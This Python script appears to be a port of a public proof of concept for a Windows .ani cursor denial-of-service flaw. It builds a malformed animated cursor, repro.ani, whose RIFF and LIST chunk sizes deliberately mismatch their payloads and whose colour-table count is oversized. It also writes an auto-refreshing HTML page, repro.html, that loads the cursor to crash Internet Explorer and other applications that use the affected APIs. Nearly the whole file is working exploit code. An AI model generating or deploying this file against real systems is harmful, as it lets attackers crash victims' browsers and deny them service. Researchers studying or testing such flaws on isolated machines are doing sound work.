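"""Build a malformed .ani cursor file plus an HTML page that loads it.

source: https://www.securityfocus.com/bid/38579/info

Microsoft Windows is prone to a remote denial-of-service vulnerability when
processing '.ani' files.  Successful exploits will cause the vulnerable
applications that use the affected APIs to crash or become unresponsive,
denying service to legitimate users.

Running this module as a script writes ``repro.ani`` (a RIFF/ACON animated
cursor whose LIST and RIFF chunk headers deliberately declare sizes that do
not match their payloads) and ``repro.html`` (a page that uses it as the
cursor).  Only run the output against an isolated test machine.

All binary helpers work on ``bytes`` so the file runs unchanged on Python 2
and Python 3; the payload is written in binary mode, because a text-mode
write would corrupt 0x0A bytes on the Windows target.
"""
import struct


def Save(name, content):
    """Write *content* to the file *name*, replacing any existing file.

    The file is opened in binary mode so the .ani payload reaches disk
    byte-for-byte.  A text string (the HTML page) is UTF-8 encoded first.
    """
    if not isinstance(content, (bytes, bytearray)):
        content = content.encode('utf-8')
    with open(name, 'wb') as handle:
        handle.write(content)


def DWord(*values):
    """Pack the given integers as consecutive little-endian 32-bit values."""
    return DWords(values)


def DWords(values):
    """Pack each integer in *values* as a little-endian unsigned 32-bit value.

    Values are truncated to their low 32 bits, so negative numbers are
    emitted in two's-complement form rather than raising.
    """
    return b''.join(struct.pack('<I', value & 0xFFFFFFFF) for value in values)


def Word(*values):
    """Pack the given integers as consecutive little-endian 16-bit values."""
    return Words(values)


def Words(values):
    """Pack each integer in *values* as a little-endian unsigned 16-bit value.

    Values are truncated to their low 16 bits.
    """
    return b''.join(struct.pack('<H', value & 0xFFFF) for value in values)


def Byte(*values):
    """Pack the given integers as single bytes."""
    return Bytes(values)


def Bytes(values):
    """Pack each integer in *values* as one byte.

    Raises ValueError for any value outside 0..255.
    """
    return bytes(bytearray(values))


def Chunk(type_id, data, fake_size=None):
    """Build a RIFF chunk: 4-byte *type_id*, little-endian size, then the data.

    *data* is anything ``DataOf`` accepts (bytes or a nested list of them).
    When *fake_size* is given it is written in the size field instead of the
    real payload length, so the header deliberately disagrees with the body.
    No pad byte is appended for odd-length payloads; every payload built in
    this file has an even length.
    """
    payload = DataOf(data)
    declared = len(payload) if fake_size is None else fake_size
    return type_id + DWord(declared) + payload


def Pad2DWords(string):
    """Append NUL bytes so that the length of *string* is a multiple of four."""
    pad = (4 - (len(string) % 4)) % 4
    return string + b'\0' * pad


def SizeOf(thing):
    """Return the serialised length in bytes of *thing* (see ``DataOf``)."""
    return len(DataOf(thing))


def DataOf(thing):
    """Serialise *thing* to bytes.

    Bytes are returned as-is; a list is serialised member by member and
    concatenated (lists may nest).  Any other type raises AssertionError.
    When a nested member fails, the offending container is printed before
    the exception is re-raised, to make the failing struct easy to find.
    """
    if isinstance(thing, (bytes, bytearray)):
        return bytes(thing)
    if isinstance(thing, list):
        try:
            return b''.join(DataOf(member) for member in thing)
        except Exception:
            print('Member of %s' % repr(thing))
            raise
    raise AssertionError('Struct contains data of unhandled type %s' % type(thing))


# http://msdn.microsoft.com/en-us/library/aa930622.aspx
BITMAPINFOHEADER = [
    DWord(0),           # biSize (size of this structure) *SET LATER*
    DWord(0),           # biWidth
    DWord(0),           # biHeight
    Word(0),            # biPlanes
    Word(0),            # biBitCount
    DWord(0),           # biCompression
    DWord(0),           # biSizeImage
    DWord(0),           # biXPelsPerMeter
    DWord(0),           # biYPelsPerMeter
    DWord(0x3F000000),  # biClrUsed (size of color table) (< 0x3FFFFFF4 to prevent overflow)
    DWord(0),           # biClrImportant
]
# Set BITMAPINFOHEADER.biSize now that the layout is complete (40 bytes).
BITMAPINFOHEADER[0] = DWord(SizeOf(BITMAPINFOHEADER))

# Colour table: 256 zeroed RGBQUAD entries (the original spelled these out
# one by one; presumably the table size matches an 8bpp palette).
RGBQUAD = DWords([0] * 256)

# http://msdn.microsoft.com/en-us/library/ms997538.aspx
ICONIMAGE = [
    BITMAPINFOHEADER,   # icHeader;   // DIB header
    RGBQUAD,            # icColors[1]; // Color table
    # BYTE icXOR[1];    // DIB bits for XOR mask (omitted)
    # BYTE icAND[1];    // DIB bits for AND mask (omitted)
]

# http://msdn.microsoft.com/en-us/library/ms997538.aspx
ICONDIR = [
    Word(0),  # idReserved
    Word(1),  # idType (1=.ICO, 2=.CUR)
    Word(1),  # idCount (number of images)
]

# http://msdn.microsoft.com/en-us/library/ms997538.aspx
ICONDIRENTRY = [
    Byte(0x20),  # bWidth
    Byte(0x20),  # bHeight
    Byte(0x0),   # bColorCount
    Byte(0),     # bReserved (must be 0)
    Word(0),     # wPlanes (color planes)
    Word(0),     # wBitCount (bits per pixel)
    DWord(0),    # dwBytesInRes (bitmap resource size) *SET LATER*
    DWord(0),    # dwImageOffset (bitmap offset in this file) *SET LATER*
]
# Set ICONDIRENTRY.dwBytesInRes (size of the image data) and
# ICONDIRENTRY.dwImageOffset (the image follows the directory and its one entry).
ICONDIRENTRY[6] = DWord(SizeOf(ICONIMAGE))
ICONDIRENTRY[7] = DWord(SizeOf(ICONDIR) + SizeOf(ICONDIRENTRY))

icon_chunk = Chunk(b'icon', ICONDIR + ICONDIRENTRY + ICONIMAGE)
fram_data = b'fram' + icon_chunk
# The declared LIST size (0x231C) intentionally does not match the real
# payload length; this mismatch is part of the original PoC and is preserved.
list_fram_chunk = Chunk(b'LIST', fram_data, 0x231C)

anih_cFrames = 0x01
anih_cSteps = 0x01
anih_cx = 0
anih_cy = 0
anih_cBitCount = 0x00
anih_cPlanes = 0x01
anih_JifRate = 0x0C
anih_flags = 0x01
# The first DWORD is the structure length, which is filled in below.
anih_struct = [
    DWord(0),               # length of structure, to be set later
    DWord(anih_cFrames),    # cFrames
    DWord(anih_cSteps),     # cSteps
    DWord(anih_cx),         # cx (must be 0)
    DWord(anih_cy),         # cy (must be 0)
    DWord(anih_cBitCount),  # cBitCount
    DWord(anih_cPlanes),    # cPlanes
    DWord(anih_JifRate),    # JifRate
    DWord(anih_flags),      # flags (1 = AF_ICON)
]
# Set the length of the structure (36 bytes).
anih_struct[0] = DWord(SizeOf(anih_struct))
anih_chunk = Chunk(b'anih', anih_struct)

inam_data = Pad2DWords(b'MSIE 8.0 .ANI vulnerability\0')
inam_chunk = Chunk(b'INAM', inam_data)
iart_data = Pad2DWords(b'SkyLined http://skypher.com\0')
iart_chunk = Chunk(b'IART', iart_data)
info_chunk = b'INFO' + inam_chunk + iart_chunk
list_info_chunk = Chunk(b'LIST', info_chunk)

acon_chunk = b'ACON' + list_info_chunk + anih_chunk + list_fram_chunk
# As with the fram LIST above, the RIFF size (0x23A8) is deliberately wrong.
riff_chunk = Chunk(b'RIFF', acon_chunk, 0x23A8)

html = '<HEAD><META http-equiv="refresh" content="0"/></HEAD>' + \
    '<BODY style="cursor:url(repro.ani)"></BODY>'

if __name__ == '__main__':
    # Files are only written when run as a script, not on import.
    Save('repro.ani', riff_chunk)
    Save('repro.html', html)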